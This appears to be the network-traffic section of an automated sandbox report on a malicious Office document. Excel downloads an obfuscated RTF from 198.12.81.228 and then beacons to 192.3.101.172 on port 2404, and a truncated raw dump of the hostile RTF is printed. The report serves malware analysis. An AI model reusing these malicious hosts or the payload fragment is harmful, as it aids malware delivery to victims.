                                                                              Aug 28, 2024 22:29:43.343508005 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343532085 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.343559980 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343571901 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343581915 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343595028 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343619108 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.343652010 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.343658924 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343671083 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343682051 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343693972 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343709946 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343719006 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.343795061 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343806982 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343816996 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343827963 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343839884 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.343846083 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343849897 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.343858957 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343872070 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343883991 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343883991 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.343895912 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343908072 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343916893 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.343919992 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.343930960 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.343962908 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344002008 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344016075 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344034910 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344047070 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344058037 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344069958 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344079971 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344082117 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344095945 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344099998 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344105959 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344114065 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344173908 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344186068 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344225883 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344324112 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344336987 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344347000 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344358921 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344377995 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344381094 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344392061 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344403028 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344408035 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344414949 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344419956 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344427109 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344438076 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344449043 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344459057 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344471931 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344491959 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344502926 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344542980 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344553947 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344603062 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344603062 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344713926 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344724894 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344736099 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344748974 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344762087 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344773054 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344778061 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344784975 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344795942 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344796896 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344813108 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344824076 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.344830036 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.344845057 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.350599051 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.678186893 CEST8049175178.237.33.50192.168.2.22
                                                                              Aug 28, 2024 22:29:43.679166079 CEST4917580192.168.2.22178.237.33.50
                                                                              Aug 28, 2024 22:29:48.859736919 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:48.867656946 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.867717028 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:48.867764950 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.867815018 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:48.875612020 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.875660896 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:48.875766993 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.875777006 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.875785112 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.875823021 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:48.875849962 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:48.880701065 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.880711079 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.880718946 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.880727053 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.880736113 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.880747080 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.880763054 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:48.880812883 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.880821943 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.881185055 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:48.891091108 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.891099930 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.892430067 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:48.892491102 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:30:06.204602957 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:30:06.206047058 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:30:06.210792065 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:30:36.232208014 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:30:36.248589039 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:30:36.257781029 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:30:54.417418003 CEST4917580192.168.2.22178.237.33.50
                                                                              Aug 28, 2024 22:30:54.729079962 CEST4917580192.168.2.22178.237.33.50
                                                                              Aug 28, 2024 22:30:55.399884939 CEST4917580192.168.2.22178.237.33.50
                                                                              Aug 28, 2024 22:30:56.663346052 CEST4917580192.168.2.22178.237.33.50
                                                                              Aug 28, 2024 22:30:59.065702915 CEST4917580192.168.2.22178.237.33.50
                                                                              Aug 28, 2024 22:31:03.948600054 CEST4917580192.168.2.22178.237.33.50
                                                                              Aug 28, 2024 22:31:06.260458946 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:31:06.262013912 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:31:06.266784906 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:31:11.015480042 CEST4916980192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:31:11.311744928 CEST4916980192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:31:11.920130014 CEST4916980192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:31:13.121347904 CEST4916980192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:31:13.607825041 CEST4917580192.168.2.22178.237.33.50
                                                                              Aug 28, 2024 22:31:15.523952007 CEST4916980192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:31:20.359844923 CEST4916980192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:31:29.969439030 CEST4916980192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:31:36.337064028 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:31:36.338655949 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:31:36.343458891 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:32:06.377800941 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:32:06.379239082 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:32:06.384064913 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:32:36.468624115 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:32:36.473841906 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:32:36.479078054 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:33:06.590250015 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:33:06.601516008 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:33:06.606353045 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:33:36.706082106 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:33:36.707429886 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:33:36.714202881 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:34:06.832181931 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:34:06.836005926 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:34:06.840850115 CEST240449173192.3.101.172192.168.2.22

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Aug 28, 2024 22:29:18.637056112 CEST5456253192.168.2.228.8.8.8
                                                                              Aug 28, 2024 22:29:18.752123117 CEST53545628.8.8.8192.168.2.22
                                                                              Aug 28, 2024 22:29:20.788198948 CEST5291753192.168.2.228.8.8.8
                                                                              Aug 28, 2024 22:29:20.806260109 CEST53529178.8.8.8192.168.2.22
                                                                              Aug 28, 2024 22:29:22.036560059 CEST6275153192.168.2.228.8.8.8
                                                                              Aug 28, 2024 22:29:22.075385094 CEST53627518.8.8.8192.168.2.22
                                                                              Aug 28, 2024 22:29:22.077455044 CEST5789353192.168.2.228.8.8.8
                                                                              Aug 28, 2024 22:29:22.100014925 CEST53578938.8.8.8192.168.2.22
                                                                              Aug 28, 2024 22:29:26.544265032 CEST5482153192.168.2.228.8.8.8
                                                                              Aug 28, 2024 22:29:26.552303076 CEST53548218.8.8.8192.168.2.22
                                                                              Aug 28, 2024 22:29:26.553512096 CEST5471953192.168.2.228.8.8.8
                                                                              Aug 28, 2024 22:29:26.560399055 CEST53547198.8.8.8192.168.2.22
                                                                              Aug 28, 2024 22:29:28.053601027 CEST4988153192.168.2.228.8.8.8
                                                                              Aug 28, 2024 22:29:28.075498104 CEST53498818.8.8.8192.168.2.22
                                                                              Aug 28, 2024 22:29:28.078092098 CEST5499853192.168.2.228.8.8.8
                                                                              Aug 28, 2024 22:29:28.084939957 CEST53549988.8.8.8192.168.2.22
                                                                              Aug 28, 2024 22:29:36.650301933 CEST5278153192.168.2.228.8.8.8
                                                                              Aug 28, 2024 22:29:36.661819935 CEST53527818.8.8.8192.168.2.22
                                                                              Aug 28, 2024 22:29:42.015204906 CEST6392653192.168.2.228.8.8.8
                                                                              Aug 28, 2024 22:29:42.024507046 CEST53639268.8.8.8192.168.2.22

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Aug 28, 2024 22:29:18.637056112 CEST192.168.2.228.8.8.80x90edStandard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:20.788198948 CEST192.168.2.228.8.8.80x48fdStandard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:22.036560059 CEST192.168.2.228.8.8.80x6660Standard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:22.077455044 CEST192.168.2.228.8.8.80x390fStandard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:26.544265032 CEST192.168.2.228.8.8.80x1100Standard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:26.553512096 CEST192.168.2.228.8.8.80x2664Standard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:28.053601027 CEST192.168.2.228.8.8.80xb6ecStandard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:28.078092098 CEST192.168.2.228.8.8.80xd97eStandard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:36.650301933 CEST192.168.2.228.8.8.80x5cdStandard query (0)ia803104.us.archive.orgA (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:42.015204906 CEST192.168.2.228.8.8.80x1fb8Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Aug 28, 2024 22:29:18.752123117 CEST8.8.8.8192.168.2.220x90edNo error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:20.806260109 CEST8.8.8.8192.168.2.220x48fdNo error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:22.075385094 CEST8.8.8.8192.168.2.220x6660No error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:22.100014925 CEST8.8.8.8192.168.2.220x390fNo error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:26.552303076 CEST8.8.8.8192.168.2.220x1100No error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:26.560399055 CEST8.8.8.8192.168.2.220x2664No error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:28.075498104 CEST8.8.8.8192.168.2.220xb6ecNo error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:28.084939957 CEST8.8.8.8192.168.2.220xd97eNo error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:36.661819935 CEST8.8.8.8192.168.2.220x5cdNo error (0)ia803104.us.archive.org207.241.232.154A (IP address)IN (0x0001)false
                                                                              Aug 28, 2024 22:29:42.024507046 CEST8.8.8.8192.168.2.220x1fb8No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • zhort.de
                                                                              • ia803104.us.archive.org
                                                                              • 198.12.81.228
                                                                              • geoplugin.net

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.2249162198.12.81.228803604C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              TimestampBytes transferredDirectionData
                                                                              Aug 28, 2024 22:29:19.730010986 CEST468OUTGET /600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc HTTP/1.1
                                                                              Accept: */*
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                              Host: 198.12.81.228
                                                                              Connection: Keep-Alive
                                                                              Aug 28, 2024 22:29:20.225430012 CEST1236INHTTP/1.1 200 OK
                                                                              Date: Wed, 28 Aug 2024 20:29:20 GMT
                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                              Last-Modified: Wed, 28 Aug 2024 10:41:36 GMT
                                                                              ETag: "17542-620bc0099129b"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 95554
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/msword
                                                                              Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 09 09 09 7b 5c 2a 5c 77 7a 53 63 72 69 70 74 49 64 41 74 74 72 32 37 32 36 33 30 30 39 31 20 5c 5b 7d 0d 7b 5c 34 37 33 30 30 38 38 36 36 2c 29 3f 39 34 39 3d 30 2e b5 3f 26 3b 3f 3f 7e 7e 34 5b 25 2f 7c 37 40 27 2e 34 31 35 36 3b 29 b0 3f 7c 7c 3a 3b 7e 25 3e 3c 3b 7c 3c 2d 37 32 5b 32 21 3f 36 2e 5e 3d 2b 3b 3d 31 a7 3f 35 33 3e 24 25 7c 2a 21 25 40 5d 5d 37 25 3e 38 23 28 27 40 b5 3b 38 38 33 3f 28 37 60 35 3f 30 25 38 34 3f 25 39 3f 25 37 7e 3b 26 33 38 2e 5b 30 21 35 60 29 5e 25 3a 3d 3f 3e 25 60 3f b5 2e 32 3f 27 29 31 60 3f 2b 3f 2d 3f 2c 5d 39 b5 60 26 35 2f 5d 26 3f 5d 29 3c b5 3f 3a 2b 3d 26 2e 60 26 5e a7 25 23 38 3e 30 32 2a 28 38 a7 2b 5e 30 b0 21 29 37 60 b5 31 31 25 31 2f 2e 39 3c 3f 25 b5 5f 27 30 2e 36 a7 3f 25 b0 7e 3d 25 60 3c 28 24 31 3e 5f 3e 3e 24 33 3f 27 29 5f b0 25 32 3c 3d 26 2a 5e 24 3f 7e 5b 36 27 35 7c 7e 7c 3e 2e 3f 3b 2c 5f 3d a7 b5 30 2b 28 39 b5 21 36 38 5e 3b 32 2f 3f 3f 3f 60 35 3f 32 24 5d 39 3f 40 3a 31 3d 5e 24 2f 5d 2f 60 5f 5d 7c [TRUNCATED]
                                                                              Data Ascii: {\rtf1{\*\wzScriptIdAttr272630091 \[}{\473008866,)?949=0.?&;??~~4[%/|7@'.4156;)?||:;~%><;|<-72[2!?6.^=+;=1?53>$%|*!%@]]7%>8#('@;883?(7`5?0%84?%9?%7~;&38.[0!5`)^%:=?>%`?.2?')1`?+?-?,]9`&5/]&?])<?:+=&.`&^%#8>02*(8+^0!)7`11%1/.9<?%_'0.6?%~=%`<($1>_>>$3?')_%2<=&*^$?~[6'5|~|>.?;,_=0+(9!68^;2/???`5?2$]9?@:1=^$/]/`_]|+6^%+9%/(>5%]=8][?94-272%$:_`~!.=3?###-:?<+?1??<~2|<9=%>%`=7?,?8??_|+._=.67*@].-3<??8747$|[]3^~2@!&@@%?8_49@^?(8?2?^5.'??2,8#1[-79@;!;9/'?-:2([-+|`:8_*#?*=377&]!4&9?.?0@5%7%73;1*6<'<#!)@)%5]%^~,07-;>%8._7?!02]?]>|+&)?87-|%<9$@>84,<%[]??&?-^70?>8&>744|88#?;'3||/)415`;[@30';;;*(169=.<`$[/=_@~??#??(<6#3('?%`~8$$_>)'7-$94?_*)~]'@9_2=8).1`(|?#`<_?450`3(?.'/0=#;87????)0*##[~?`3,:<&7#.54!9-/_!([?5-^!#??=,3|^7/|5?,,74?=_%[?(9,-@;]/7?*)$(|2;|'2:?231,_%?!/?_230?660^?*??9??*?*~'^~&`:(9#(%_$*#^?1_()>'[']`<:#-%|04,8.;#@:@[~=.']959#),[%
                                                                              Aug 28, 2024 22:29:20.225444078 CEST1236INData Raw: 5b 2d 37 2d 3b 35 2c 3f 3d 30 30 7e 29 5b 28 32 3f 2e 33 2f 40 30 40 5f 3f 3a 3e 36 33 27 26 a7 24 2f 2e 28 3c 2c 33 26 2b 3e 3a 26 28 32 32 36 21 3c 23 32 2d 25 b0 24 3b 21 7c 3a 5b 25 5b 21 30 3c 40 27 3e 2b 3f 23 25 26 3c b0 2f 27 3d 3f 25 21
                                                                              Data Ascii: [-7-;5,?=00~)[(2?.3/@0@_?:>63'&$/.(<,3&+>:&(226!<#2-%$;!|:[%[!0<@'>+?#%&</'=?%!/?8=$;#~5&6?+?&5?@/+,@*?;4!<|2*?1?(-#?1?97-]20?7#>2;?>*~(;,256@%_362;~43^`#&@@#3/-52?+(0#,_(,>5]??=4??/>?9<?.;?9|?|]_)(:#2~,%/2~/]8#42]+4'/%6]0.<?#>?`%.$;
                                                                              Aug 28, 2024 22:29:20.225450039 CEST1236INData Raw: 27 40 37 29 33 2b 3c 3f 3a 60 27 3a 26 2d a7 38 23 a7 29 40 23 26 2e 33 2d 33 29 3e 5e 33 25 31 3e 3f 39 37 5d 2d 3a 24 3f 3f 3d a7 2a 5b 60 25 60 3f 32 3c 25 24 60 23 2d 39 34 27 2f 25 28 3f 5e 3f 3c 29 60 29 3f 27 5f 26 28 60 5f 7e 3f 3c 2a 5f
                                                                              Data Ascii: '@7)3+<?:`':&-8#)@#&.3-3)>^3%1>?97]-:$??=*[`%`?2<%$`#-94'/%(?^?<)`)?'_&(`_~?<*_['-4#,;??>-6?-`5]5500%-:6?61[~,>'??:&2/<*7=?%;8!37263?41>3#@!#:1].]$|]>*<=``0+?$>*%3^-+$6:((&`?/%?'(3#?2/%9*$_.(%%:3/~,'@???;6<,=]^~|(`?5)2-^)$2??2~
                                                                              Aug 28, 2024 22:29:20.225457907 CEST672INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                              Data Ascii: {\object\inixjwdvoosodpljmvhYQHFCSVJHMUZFSJUTOROPTCOC21521217104482831018259inixjwdvoosodpljmvhYQHFCSVJHMUZFSJUTOROPTCOC14464290663834559{\wwetem
                                                                              Aug 28, 2024 22:29:20.225467920 CEST1236INData Raw: 32 30 0d 0d 0a 0d 0a 0a 0d 0a 0a 0a 0a 0d 0a 0d 0a 0a 0d 0d 0d 0d 0d 32 0a 0d 0a 0d 0a 0a 0d 0a 0a 0a 0a 0d 0a 0d 0a 0a 0d 0d 0d 0d 0d 30 30 30 0a 0a 0a 0d 0a 0a 0d 0a 0a 0a 0a 0d 0a 0d 0a 0a 0d 0d 0d 0d 0d 30 30 30 09 09 20 09 09 09 20 09 20 09
                                                                              Data Ascii: 202000000 0b00000 06
                                                                              Aug 28, 2024 22:29:20.225496054 CEST1236INData Raw: 09 09 20 20 09 09 09 20 20 20 20 09 20 20 20 09 09 20 09 09 09 20 20 20 09 20 30 0d 0a 0d 0a 0d 0d 0d 0d 0d 0d 0a 0a 0a 0a 0a 0a 0a 0a 0d 0d 0d 30 20 09 09 09 20 20 20 20 20 20 20 09 09 09 20 09 09 20 20 20 09 09 20 20 09 20 09 20 20 09 20 20 20
                                                                              Data Ascii: 00 000970 70000
                                                                              Aug 28, 2024 22:29:20.225501060 CEST1236INData Raw: 09 20 09 09 09 09 09 09 20 09 09 09 20 20 20 09 20 09 20 20 09 09 09 09 09 09 09 20 20 09 20 09 09 09 09 20 20 20 20 20 20 20 09 09 09 20 09 09 20 20 09 20 20 09 20 32 20 20 20 20 20 20 09 09 09 20 20 20 20 09 09 20 09 09 09 09 09 09 20 09 09 09
                                                                              Data Ascii: 2 9bf4f 9
                                                                              Aug 28, 2024 22:29:20.225506067 CEST1236INData Raw: 09 09 20 09 09 09 20 20 09 20 20 20 20 20 09 09 09 20 20 09 09 09 09 09 09 20 09 20 09 09 20 09 20 09 09 20 20 09 09 20 20 09 20 20 09 20 20 20 20 09 20 09 20 09 09 09 20 20 35 09 09 09 09 09 20 20 09 09 09 20 09 20 20 20 09 20 20 20 09 20 20 20
                                                                              Data Ascii: 5 a f
                                                                              Aug 28, 2024 22:29:20.225511074 CEST1236INData Raw: 09 20 20 20 20 09 20 20 09 20 20 09 20 20 09 20 09 09 09 09 20 09 20 20 09 09 09 20 20 09 20 20 20 09 09 09 09 09 20 09 20 20 20 64 0a 0d 0d 0a 0a 0a 0a 0a 0d 0d 0d 0d 0d 0a 0a 0a 0a 0d 0a 0d 0a 38 38 66 66 63 09 09 09 09 09 09 20 09 09 20 20 20
                                                                              Data Ascii: d88ffc 56e 8b807f
                                                                              Aug 28, 2024 22:29:20.225517988 CEST1236INData Raw: 0d 0d 0a 0a 0d 0a 30 30 0d 0a 0a 0d 0d 0a 0a 0d 0a 0d 0a 0d 0d 0a 0d 0d 0d 0a 0a 0d 0a 30 34 35 0a 0a 0d 0a 0d 0a 0d 0a 0a 0d 0d 0a 0d 0a 0d 0d 0d 0a 0a 0d 0a 66 66 63 62 0d 0a 0a 0d 0d 0a 0d 0a 0a 0d 0d 0a 0d 0a 0d 0d 0d 0a 0a 0d 0a 66 39 36 0d
                                                                              Data Ascii: 00045ffcbf96c a 5
                                                                              Aug 28, 2024 22:29:20.233177900 CEST1236INData Raw: 09 20 09 20 09 20 09 09 09 20 20 20 09 20 09 20 09 09 20 09 20 09 20 20 09 20 09 20 09 20 09 09 09 09 09 09 20 20 20 20 09 09 20 09 09 09 20 20 20 09 09 09 09 20 31 66 0d 0a 0d 0a 0d 0d 0d 0d 0a 0a 0a 0a 0d 0d 0a 0d 0d 0d 0a 0d 0a 33 09 09 09 20
